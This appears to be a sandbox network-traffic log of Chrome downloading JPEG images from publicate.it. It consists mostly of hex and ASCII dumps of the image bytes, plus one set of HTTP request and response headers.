                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: b1 0a 7d 06 0b 89 e2 10 99 68 70 fa aa 88 86 d7 c7 19 23 d6 92 a7 46 2b 32 49 76 11 ab 5e 4f 11 93 7f 9b 24 6f 9b 1b e9 6a ce d1 37 cd 8d f4 b5 67 68 b1 52 c6 f8 a4 74 72 b1 cc 91 a6 ce 6b 85 88 3e 50 57 95 6d 8d 2e 95 d8 8d bd 55 ff 00 27 dd 99 7d f3 63 7d 2d 59 da 26 f9 b1 be 96 ac ed 16 32 9e 09 6a 66 6c 34 f1 3e 59 5c 6c d6 31 a5 c4 f5 00 a4 e2 18 46 23 86 b5 ae af a1 a9 a6 6b b5 07 49 19 00 fa 55 5d 3a 29 e1 a5 9f c8 95 56 bb 5a c9 bc 7e 64 ad f3 63 7d 2d 59 da 26 f9 b1 be 96 ac ed 16 21 15 b6 34 fa 57 62 be 22 af 53 ee cc be f9 b1 be 96 ac ed 13 7c d8 df 4b 56 76 8b 10 89 b1 a7 d2 bb 0f 11 57 a9 f7 66 5f 7c d8 df 4b 56 76 89 be 6c 6f a5 ab 3b 45 88 44 d8 d3 e9 5d 87 88 ab d4 fb b3 2f be 6c 6f a5 ab 3b 44 df 36 37 d2 d5 9d a2 c4 22 6c 69 f4 ae c3 c4
                                                                                                                                                                                                        Data Ascii: }hp#F+2Iv^O$oj7ghRtrk>PWm.U'}c}-Y&2jfl4>Y\l1F#kIU]:)VZ~dc}-Y&!4Wb"S|KVvWf_|KVvlo;ED]/lo;D67"li
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 86 08 a7 96 36 bb 39 ac 7b 9a 1d ce 01 b5 d7 84 45 d0 2e 47 3a c2 22 21 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 11 11 00 44 44 01 11 10 04 44 40 76 ad cb 31 02 ec 92 8a 37 92 4c 32 be 31 e4 1b 47 da 8b 15 b9 6f fc bb 37 ef 2f fb ad 45 ca 5d c1 2a d2 f9 9d 8d 9c db a1 0f 91 cf 32 9b fe 62 c5 3f 79 93 ef 15 8d b2 fa 0f 7b 78 2d 47 e5 a7 c2 a8 a4 96 4f 09 ef 74 40 97 13 b4 94 de b6 03 d0 f4 1d 88 5e 94 34 b4 23 15 1d 57 c0 f2 aa 68 7a 92 93 96 b2 e2 7c f9 64 b2 fa 13 7a d8 0f 43 d0 76 21 37 ad 80 f4 3d 07 62 15 b7 bd 3e 96 53 72 d4 ea 47 cf 76 4b 2f a1 37 ad 80 f4 3d 07 62 13 7a d8 0f 43 d0 76 21 37 bd 3e 96 37 2d 4e a4 7c f7 64 b2 fa 13 7a d8 0f 43
                                                                                                                                                                                                        Data Ascii: 69{E.G:"!D@DDD@DDD@DDD@DDD@DDD@v17L21Go7/E]*2b?y{x-GOt@^4#Whz|dzCv!7=b>SrGvK/7=bzCv!7>7-N|dzC
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 ec 79 8a 58 f3 15 21 13 58 6a 91 91 48 2d 07 68 56 9e cb 6b 1b 11 30 d1 e1 11 14 90 11 11 01 02 bf 8f 1e 68 44 af e3 c7 9a 11 09 25 c1 c4 47 d4 ae 2b 70 71 11 f5 2b 88 40 55 68 ce 75 95 15 d8 46 a2 51 84 5c 02 c2 c1 11 0a a1 70 8b 5b ca 1c b5 c1 b0 2a ae e6 ac 9d ef a8 00 17 47 0b 33 cb 41 d9 7e 40 b1 3d f4 72 7f fc 6f 61 fe ab 62 16 95 e6 b5 a3 06 d7 c8 d4 9d
                                                                                                                                                                                                        Data Ascii: jyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjyX!XjH-hVk0hD%G+pq+@UhuFQ\p[*G3A~@=roab
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: d6 da e7 ee be 4b fb 9f 3f 65 33 a1 c1 6b 4d 2b 66 d3 bc 1e 18 69 0d b7 52 c8 64 ee 18 31 da 57 cb 4f 53 1b 1c c3 62 d7 02 55 8d d0 e1 a4 7e 35 21 7c 6e ce 05 c2 e3 ad 4b dc 86 20 2b 31 3d 13 9c 63 0d 66 a3 c8 6e 57 3d 4b 4a 69 28 cf 5e 72 e0 fe 1c 0f a6 5d 7b 39 ec e4 ec 14 29 43 15 22 bd 5e 5f af 9f 13 25 83 e4 dd 4c 78 eb 21 aa 80 cb 9a d3 24 61 83 39 b2 38 6c 1d 57 58 fa fc 91 c7 ea 72 be 86 4c 4a 9d a6 94 cf 1b a4 76 94 5c 37 38 5f 55 d7 6d c0 5b 1c 31 49 3b c8 04 78 1a f9 07 3a e7 5b a1 e3 ee a3 ad 8d f1 b4 b8 36 56 82 e7 92 05 af c8 16 a6 97 d2 d5 2b 6a fd 94 df 2f fc 34 3d 9e d1 53 b4 ab 2a 36 93 71 4f 8f 97 d5 9b 06 e8 98 ed 26 17 42 e8 5b 2c 71 46 d2 3c 16 36 ff 00 62 e5 b8 ae 37 85 63 98 64 f4 15 72 44 f3 23 48 8d f2 44 41 63 b9 1c 0a ca 6e c1
                                                                                                                                                                                                        Data Ascii: K?e3kM+fiRd1WOSbU~5!|nK +1=cfnW=KJi(^r]{9)C"^_%Lx!$a98lWXrLJv\78_Um[1I;x:[6V+j/4=S*6qO&B[,qF<6b7cdrD#HDAcn
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 3a 87 da 93 e2 9b b2 e3 d3 ea 88 df 76 9d 5f 46 75 d4 5c 8f be 8e 25 d1 d4 3e d4 9f 14 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f7 69 d5 f4 67 5c 45 c8 fb e8 e2 5d 1d 43 ed 49 f1 54 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f7 69 d5 f4 67 5d 45 c8 bb e8 e2 5d 1d 43 ed 49 f1 4e fa 38 97 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 d4 5c 8b be 8e 25 d1 d4 3e d4 9f 14 ef a3 89 74 75 0f b5 27 c5 37 65 c7 a7 d5 0d f5 69 d5 f4 67 5d 45 c8 7b e9 62 5d 1d 43 ed 49 f1 4e fa 58 97 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 e4 5c 87 be 96 25 d1 d4 3e d4 9f 15 4e fa 58 9f 47 50 fb 52 7c 53 76 5c 7a 7d 50 df 56 9d 5f 46 75 f4 5c 83 be 9e 25 d1 d4 3e d4 9f 14 ef a5 89 93 61 86 d0 df ce 93 e2 9b b6 e3 d3 ea 89 df 56 8f fe 4f b3 3a fa 2e 7b 5d 97 75
                                                                                                                                                                                                        Data Ascii: :v_Fu\%>tu'7eig\E]CITtu'7eig]E]CIN8GPR|Sv\z}PV_Fu\%>tu'7eig]E{b]CINXGPR|Sv\z}PV_Fu\%>NXGPR|Sv\z}PV_Fu\%>aVO:.{]u
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 83 f5 02 64 71 e5 da 3d 6b 9a e5 83 31 69 ea e0 c4 f1 86 32 d5 91 35 d0 c9 10 b3 0b 6d 70 de b1 7e 5d 6b 25 b5 dc eb 4f 2d 62 2f 97 ab 30 dd d9 53 b7 a7 85 26 e6 b1 9c 72 49 9a f2 2a d9 2c bd 03 cb 29 65 4b 2f 56 44 07 94 55 44 05 11 55 14 60 14 45 5b 2f 6c 61 7b 83 5a 09 71 36 00 72 94 1c cf 2c 8d d2 3d ad 8d ae 73 9c 6c 1a d1 72 4a d9 68 f2 17 1d a9 8d af 7d 33 29 da ed 63 4e f0 d3 ea d6 57 4d c8 8c 94 87 27 b0 f6 d4 d5 46 d7 62 72 b6 ef 71 17 d1 0f 15 bf d4 a9 72 cc e9 27 74 99 dd 56 5c d5 ee 9c 70 93 8d 05 cb cd 9d 9e 8c f6 66 35 60 a7 72 df 1f 24 72 5c 4f 23 6b f0 d8 c4 95 53 52 e6 13 6f 01 c4 9f 55 96 a3 89 d5 c7 04 86 2a 77 45 9e 0f 0a 47 5f dc 17 4b cb 79 67 aa 8f 49 62 e6 bd 97 68 bd 80 1c 97 5c 2a a4 96 cf 20 b0 be 71 5c c5 d6 9f bb ad 2d 55 2c
                                                                                                                                                                                                        Data Ascii: dq=k1i25mp~]k%O-b/0S&rI*,)eK/VDUDU`E[/la{Zq6r,=slrJh}3)cNWM'Fbrqr'tV\pf5`r$r\O#kSRoU*wEG_KygIbh\* q\-U,
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 84 e1 b1 69 51 b4 bd ed 63 76 b8 80 3d 2b bc 64 6c 31 50 3a 9a 8e 21 60 21 24 f9 4f 3a f1 34 d5 f3 b6 84 69 43 9c ff 00 a7 99 d1 fb 3b a3 55 dd 49 56 9f dd 87 f5 f2 ec 6c 58 81 3a 37 75 2d 46 bd e6 2a 0a 99 75 5d 91 3d de a0 56 e1 5c 2e c7 75 2d 23 19 f0 f0 9a f6 37 69 86 40 3d 92 b8 da dc cf a2 5a f2 e0 60 72 91 ac 8a 82 89 84 00 1b 4e c1 af a9 72 6c 43 b8 fb a2 5d 51 ed f1 57 5b cb 38 5c e8 a9 48 70 d7 4c cd 5c da 97 20 ad a4 93 4f 25 cb 76 f3 aa aa 14 13 e3 23 a3 b2 bb bd 85 35 b1 a7 94 62 aa e9 e9 de 4e 8f 34 1f 21 b2 eb 1b 9a 44 e6 64 ad 2b 5d af c3 92 de d2 e4 d5 34 af bf ea fa d7 68 c8 2a 7e e7 c9 6c 39 8f 1e 11 8f 38 fa 49 2a 65 4a 94 3e d4 1e 4b df 5f dd d6 a3 b2 b8 a7 aa b3 9c e4 d9 e0 6e cf 04 2d b6 8a 16 51 53 35 91 f0 a4 f0 9c 49 e5 b2 d5 e1
                                                                                                                                                                                                        Data Ascii: iQcv=+dl1P:!`!$O:4iC;UIVlX:7u-F*u]=V\.u-#7i@=Z`rNrlC]QW[8\HpL\ O%v#5bN4!Dd+]4h*~l98I*eJ>K_n-QS5I
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: fa 9d 36 ad b7 6a d3 71 38 dc 64 a8 88 ea 0f 04 0f 48 5b 94 32 0a 9a 56 48 dd 79 ed 05 6b 38 ec 25 93 09 4e cd 96 5c c5 7e 2b 59 1d 7d a3 d5 96 ab 39 d6 39 88 4d 2e 1f 4c f9 1e d2 45 3b 05 ed cc 2c 57 25 aa c5 6a 5d 3c 9c 5f 08 fe aa ea d8 ed 0c cc a3 90 36 27 39 81 cf 00 b7 5e ab 93 fd 57 21 a8 a5 9c 54 48 04 12 f0 8f ea 15 e3 6b 54 52 79 67 d4 74 15 2a 32 a6 d3 c1 62 6a da 89 0d 83 85 ce a1 66 af a1 70 48 1d 4d 86 52 43 b7 47 0b 1a 7a c0 0b 87 e0 38 35 55 5e 2b 46 c3 4e f6 c6 65 6e 71 70 b6 ab eb 5d f6 11 ca dd 4b 66 8c a4 f3 93 cc f6 9f 67 17 4e 9d 3c 79 b2 5c 36 36 b6 a2 bd be 6d 1c d9 af e0 bc 6b 2b cc 7b 3c 20 b4 5c 7b 2b e2 6e 57 4b 81 34 b4 34 41 9a 24 fd b1 d7 9b ea f7 ac f1 86 d2 51 8f ab 39 58 53 94 94 dc 56 75 53 7d 8d e0 3e 37 c2 75 82 d2 2e
                                                                                                                                                                                                        Data Ascii: 6jq8dH[2VHyk8%N\~+Y}99M.LE;,W%j]<_6'9^W!THkTRygt*2bjfpHMRCGz85U^+FNenqp]KfgN<y\66mk+{< \{+nWK44A$Q9XSVuS}>7u.
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 17 56 f9 28 df 04 a7 80 7c 03 ce 39 54 dc 6e 9f 49 0b 87 a4 2d 13 20 71 d6 d5 53 b6 07 bb 36 b2 1d 7a ff 00 5c 73 ae 92 e2 da 9a 60 f6 ec 22 eb 80 9d 09 d0 6e da a7 de 89 f5 18 dd 53 b9 6a ea 8f dd 91 cf 2a a3 73 e9 66 02 c0 e7 5f dd fe 8b 4a a9 a3 9b 48 fb 06 ed e7 5d 46 7a 06 1a 89 d8 fb 80 e6 e7 34 8e 42 b5 8a 8c 29 9a 47 fe 55 db 79 97 39 79 5a a5 29 e1 1d 56 8f bc 50 4d 1a f6 4f 61 ef 18 a3 24 79 69 cc 05 d6 0b 74 89 a0 ec da a1 61 f4 51 d3 b9 ce 8e e5 c7 51 25 65 23 60 27 58 5b 36 b3 94 a9 a9 4b cc c5 7d 5f 6f 53 5b d0 87 8e 62 23 09 c2 27 aa 20 39 ed 69 11 b4 fe b3 f9 02 f9 b2 b0 d4 d6 57 e9 f3 9c ea c7 cb 9c 5d ca 5c 4d ef eb 5d 7b 2e eb 9d 5d 33 63 85 c4 c1 03 b3 40 f1 8f 29 5a 6c 18 7c 74 f5 52 4c 45 e4 71 d4 3c 5e 7f 4a f4 74 75 a4 f4 95 75 1a
                                                                                                                                                                                                        Data Ascii: V(|9TnI- qS6z\s`"nSj*sf_JH]Fz4B)GUy9yZ)VPMOa$yitaQQ%e#`'X[6K}_oS[b#' 9iW]\M]{.]3c@)Zl|tRLEq<^Jtuu


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        64192.168.2.549824104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC879OUTGET /images/nhph2-p-500.jpg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 17632
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "44e0-620aa1d1ccbe8"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8oUs00SbGk3CV5x%2BqPRLuNv55zjKfkQY93dU14iLttww%2FCJYbexN1lbuNSm587fXc0Tjbvj%2FHa2JNDuQ2JcnuBnsvLQF%2BxbyaqeZdTLlxK6B6wwiTn0HlhUQIw3ng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b2788b4244-EWR
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC619INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 76 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 06 07 05 08 ff c4 00 57 10 00 01 03 02 01 08 05 06 08 09 0a 03 08 03 01 00 01 00 02 03 04 11 05 06 12 13 14 21 31 51 91 07 41 52 61 71 22 32 33 92 a1 c1 15 16 53 62 72 81 b1 e1 08 17 23 34 42 54 93 b2 d1 24 37
                                                                                                                                                                                                        Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((v"W!1QARaq"23Sbr#4BT$7
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 5e 5e c3 7d 6f b9 48 88 23 bc bd 86 fa df 72 09 2c 6c f6 96 9e fd dc d4 88 e0 1c 08 22 e0 a0 22 8a 32 58 f2 c2 6f 6d a0 9e 0a 54 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 26 ca c0 5c 45 c0 d9 de 50 5e 8a cf 2f 80 e6 9e 5f 01 cd 05 e8 ac f2 f8 0e 69 e5 f0 1c d0 5e 8a cc e2 0d 9c 2d 74 ce 2e be 68 dc 82 f4 3b 95 9e 5f 01 cd 0e 7f 01 cd 05 8c db 51 fe 1f 7a 99 40 d8 de 25 2e d9 ba db d4 9e 5f 01 cd 05 e8 ac 25 cd de 36 77 15 78 37 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 04 44 40 44 44 10 cb b2 76 78 1f 72 98 6e 50 cd e9 a3 f0 3e e5 2b 77
                                                                                                                                                                                                        Data Ascii: ^^}oH#r^^}oH#r^^}oH#r^^}oH#r,l""2XomTD@DDD@DDD@DDD@D&\EP^/_i^-t.h;_Qz@%._%6wx7@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDvxrnP>+w
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 2a ce 7f 7f e7 f3 28 b3 55 55 df a6 70 ee 52 fa 37 78 24 7b 92 5f 46 ef 04 8f 72 f0 ce ea e4 44 40 44 44 04 44 41 8f 59 4e 67 0d 2d 20 11 c5 62 ea 32 f1 67 35 e9 22 9c a3 0f 37 51 97 8b 39 a6 a3 2f 16 73 5e 92 26 4c 3c dd 46 5e 2c e6 9a 8c bc 59 cd 64 4b 5a c6 3c b4 34 ba db 09 56 7c 20 df 93 77 34 dd 1b 22 d4 65 e2 ce 69 a8 cb c5 9c d4 bf 08 37 e4 dd cd 3e 10 6f c9 bb 9a 6e 6c 8b 51 97 8b 39 a6 a3 2f 16 73 52 fc 20 df 93 77 34 f8 41 bf 26 ee 69 b9 b2 2d 46 5e 2c e6 9a 8c bc 59 cd 4b f0 83 7e 4d dc d3 e1 06 fc 9b b9 a6 e6 c8 b5 19 78 b3 9a 6a 32 f1 67 35 2f c2 0d f9 37 73 4f 84 1b f2 6e e6 9b 9b 22 d4 65 e2 ce 69 a8 cb c5 9c d4 cd af 61 70 05 ae 00 f5 ac c4 ca 71 0f 37 51 97 8b 39 aa 6a 32 f1 67 35 e9 a2 64 c3 1e 8e 9c c0 1c 5c 41 27 82 c8 44 50 91 11 10
                                                                                                                                                                                                        Data Ascii: *(UUpR7x${_FrD@DDDAYNg- b2g5"7Q9/s^&L<F^,YdKZ<4V| w4"ei7>onlQ9/sR w4A&i-F^,YK~Mxj2g5/7sOn"eiapq7Q9j2g5d\A'DP
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: b9 45 37 a6 8f c0 fb 94 ad dc 82 a8 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 82 c9 77 2a b3 d1 b7 c1 52 5d ca ac f4 6d f0 41 f2 7f 49 ce 64 5d 2f 62 33 4a 73 63 65 6c 2f 73 8f 50 01 84 95 da b1 bc a9 e8 e3 18 b3 ab f1 6c 3d d2 03 b2 46 b9 cd 77 85 c0 dc b8 c7 4a ac 8c f4 9d 8c 19 da 5d 0e b0 cc f0 0d 8d b3 1b 75 e0 cb 4f 93 e6 51 79 aa c3 3c a0 40 04 ed 0d 39 a6 fc 0b b3 47 35 ee 27 47 4e a6 cd 9a a6 aa a2 69 a6 3a 7d 21 d1 9b 7c d4 d3 3f 27 5b e9 5b 2b 32 36 a7 a3 1c 53 08 c9 ec 4a 85 f3 cb a3 11 c1 00 37 75 a4 69 3d 5b 76 03 b4 ac 0f c1 35 b9 b0 e5 3f d3 a7 fb 1e b9 05 44 18 48 88 96 39 ee 76 af 7b 67 3a fa 7e 03 67 99 df bd 76 3f c1 4d b9 b0 e5 37 d3 a7 fb 1e b5 f5 da 4a 74 bc 3e e5 34 cc ce 66 27 7f ac 29 5d 3c 96 e6 1d e2 a3 cd 1e 2a b4 fe 61
                                                                                                                                                                                                        Data Ascii: E7w*R]mAId]/b3Jscel/sPl=FwJ]uOQy<@9G5'GNi:}!|?'[[+26SJ7ui=[v5?DH9v{g:~gv?M7Jt>4f')]<*a
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: bb b9 8a 57 9f b9 5f ab 86 8b ba c3 c5 70 71 8d e2 62 f6 c4 2a c7 84 a4 7d 8a a3 1a c4 ef 7f 84 2a ef df 29 2a d8 94 65 db e4 9e 96 32 41 91 a4 8d e1 a2 ff 00 62 c1 9f 16 8e 31 f9 38 24 77 8d 9a b9 65 3e 53 e3 11 00 35 c3 20 e1 23 1a ef 72 f4 29 32 8f 18 aa a8 64 6d 11 48 e7 9b 00 d8 c0 2a 95 45 70 bd 3c ad e8 e2 d5 2f 75 a1 a2 04 75 dd e7 f8 2c ea 49 aa 65 b1 92 91 ad 1d 6e 12 6c 1c c2 c3 a7 fe 4f 13 5d 52 ed 24 d6 dc 77 0f 00 b1 eb 71 19 5c 0b 5a 48 1c 02 d6 f1 aa 66 f0 e1 ea 57 e2 54 b4 6c 24 91 23 f8 75 2d 03 29 72 b6 69 4b 99 0b bb b6 6e 0a 1c 7f 10 64 00 eb 12 5d e7 74 60 ed 3e 2b 48 aa a9 74 f2 13 60 d1 c0 2c f6 e8 9a ff 00 15 6c 55 cc 51 b5 3d 55 ab a9 92 79 4b e5 7b 9c e3 d6 4a 84 9e 2a c5 42 b6 d8 1e a5 06 3f 89 61 c4 0a 3a d9 e3 68 fd 12 ec e6
                                                                                                                                                                                                        Data Ascii: W_pqb*}*)*e2Ab18$we>S5 #r)2dmH*Ep</uu,IenlO]R$wq\ZHfWTl$#u-)riKnd]t`>+Ht`,lUQ=UyK{J*B?a:h
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 5c 6a 21 8c 79 73 46 df 17 00 a7 13 28 99 88 ea 95 16 1b f1 4a 08 fc fa ea 56 f8 ca d1 ef 58 d2 65 16 0d 1f 9d 8a 51 0f fa cd 3e f5 68 b7 5c f4 89 52 6f 5b a7 ad 51 f9 bd 54 5e 0b f2 bf 00 65 ef 8a d2 fd 4e bf d8 bd 0c 2b 14 a3 c5 61 74 d8 7c ba 68 41 cd cf 0d 21 a4 f7 12 36 fd 4a 6a b5 72 88 cd 54 cc 47 d1 5a 35 16 ab 9e 5a 2a 89 9f ab 39 11 16 36 61 11 10 11 11 01 11 10 11 11 05 92 ee 55 8f d1 b7 c1 52 5d ca b1 f9 8d f0 41 f3 97 4d 98 59 aa cb ea 99 a0 3f 96 d1 c3 76 9d ce f2 47 b5 49 92 99 67 8b 64 8d 44 94 92 c6 e9 a9 5a e2 1f 49 39 2d 31 bb e6 9d ed f0 dc bd 3e 95 c5 b2 ee 72 76 03 1c 24 5f af 62 e9 f9 59 91 78 66 53 c2 c7 d4 34 c1 58 d0 03 6a 62 03 3a dc 0f 53 87 8a cd c5 38 75 36 ed d9 bf a7 da aa a3 7f 9f 47 4f 83 f1 c8 ab 9f 47 ae a7 9a dc 4e dd
                                                                                                                                                                                                        Data Ascii: \j!ysF(JVXeQ>h\Ro[QT^eN+at|hA!6JjrTGZ5Z*96aUR]AMY?vGIgdDZI9-1>rv$_bYxfS4Xjb:S8u6GOGN
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 72 ac 7e 8d be 08 f1 b1 46 25 cc 00 16 de c8 2b 2d 3c 32 90 65 8a 37 91 b8 b9 a0 a9 40 50 e9 c7 64 a6 9c 76 4a 18 49 23 1b 23 0b 24 6b 5c d3 bc 38 5c 15 48 a2 8e 26 e6 c5 1b 58 dd f6 68 01 59 a7 1d 92 9a 71 d9 28 61 5a 8f 34 78 aa d3 f9 87 c5 58 e7 19 2d b2 c0 23 5c 63 b8 b5 c2 0f 2b 2c 32 66 87 2a b0 87 50 62 01 c0 03 9f 1c ac f3 a3 77 11 fc 3a d7 97 86 64 58 a6 c8 39 f2 62 b2 b4 d5 40 f6 c8 c8 e5 d1 e6 96 35 c6 ed d9 73 b8 ad af 4d f3 4a a6 9e df a2 56 5a 6f 5c a6 98 a2 27 68 9c fd d8 aa b1 6e aa a6 b9 8d e6 31 f6 72 9c 4b a2 6c 47 13 a0 c3 e8 eb 72 8d 92 c5 42 c3 1c 24 d1 f9 41 a4 ee 2e ce b9 03 ab 82 d9 ba 3f e8 f6 83 24 1f 2d 43 66 75 65 7c 8d cc 33 bd a1 a1 ad e0 d1 d5 7e b2 b6 e1 54 d2 fc d0 d3 7b 5d 5f a6 f9 a5 65 af 5b 7a ba 3c 39 ab 6f b3 15 1a
                                                                                                                                                                                                        Data Ascii: r~F%+-<2e7@PdvJI##$k\8\H&XhYq(aZ4xX-#\c+,2f*Pbw:dX9b@5sMJVZo\'hn1rKlGrB$A.?$-Cfue|3~T{]_e[z<9o
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 15 76 53 68 63 30 d2 b5 91 33 a9 91 80 d1 c8 2c 1e 67 9b d1 0c b1 63 1e a9 79 14 99 1d 52 00 7e 27 55 0d 23 3b 20 e7 bf 90 d8 39 af 42 3a 3c 03 0c 19 cd 80 d5 48 3f 4e a0 df 93 77 2f 0e b3 17 96 47 5e 47 5c 9d c2 eb 01 ce aa a8 77 e4 e2 9a 57 1d cd 63 49 51 8b 95 fa a5 39 a2 9e 90 d9 31 1c a8 93 33 47 19 0c 88 6e 6b 45 87 d4 02 d7 2a 71 59 e7 27 ca 2a f8 b0 1c 4a 73 9d 3c 6c a7 6f 19 9e 1b 6f ab 7a 92 4c 1a 8e 3d 95 98 bc 2c 6f 5b 61 69 71 e6 6c af 4d 36 e8 56 aa ab a9 e1 d4 56 12 48 0e b9 3b ce f5 8f 00 96 aa a5 91 b1 ae 71 27 cd 1b 49 5e f1 76 4c 51 d8 b9 b5 15 6e 1f 29 25 87 20 aa 32 c6 9e 84 11 85 51 41 4f d5 76 30 03 cf 7a cd cd 38 fc 14 b1 72 c6 7f 15 4f 6f 06 c9 5a 99 5a d9 2a 5a 22 6f 19 0d ad f5 2d 9a 96 93 06 c2 9b 9d 3c ad 91 e3 86 e5 ca eb 72
                                                                                                                                                                                                        Data Ascii: vShc03,gcyR~'U#; 9B:<H?Nw/G^G\wWcIQ913GnkE*qY'*Js<loozL=,o[aiqlM6VVH;q'I^vLQn)% 2QAOv0z8rOoZZ*Z"o-<r
